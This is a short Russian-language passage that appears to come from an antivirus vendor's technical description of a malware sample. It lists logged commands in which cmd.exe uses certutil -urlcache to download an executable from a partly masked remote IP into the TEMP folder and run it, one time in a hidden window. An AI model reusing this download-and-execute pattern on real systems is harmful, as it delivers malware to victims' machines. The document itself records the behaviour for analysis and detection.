Техническая информация
- '<SYSTEM32>\cmd.exe' /cCmD rrhGA cmd /ccertutil -urlcache -split -f http://5.##.133.137/88/2525597 %TEMP%\dKdC1pK7TRh1Kz3DaJpc.exe& %TEMP%\dKdC1pK7TRh1Kz3DaJpc.exe
- '<SYSTEM32>\cmd.exe' /cCmD rrhGA cmd /ccertutil -urlcache -split -f http://5.##.133.137/88/2525597 %TEMP%\dKdC1pK7TRh1Kz3DaJpc.exe& %TEMP%\dKdC1pK7TRh1Kz3DaJpc.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' rrhGA cmd /ccertutil -urlcache -split -f http://5.##.133.137/88/2525597 %TEMP%\dKdC1pK7TRh1Kz3DaJpc.exe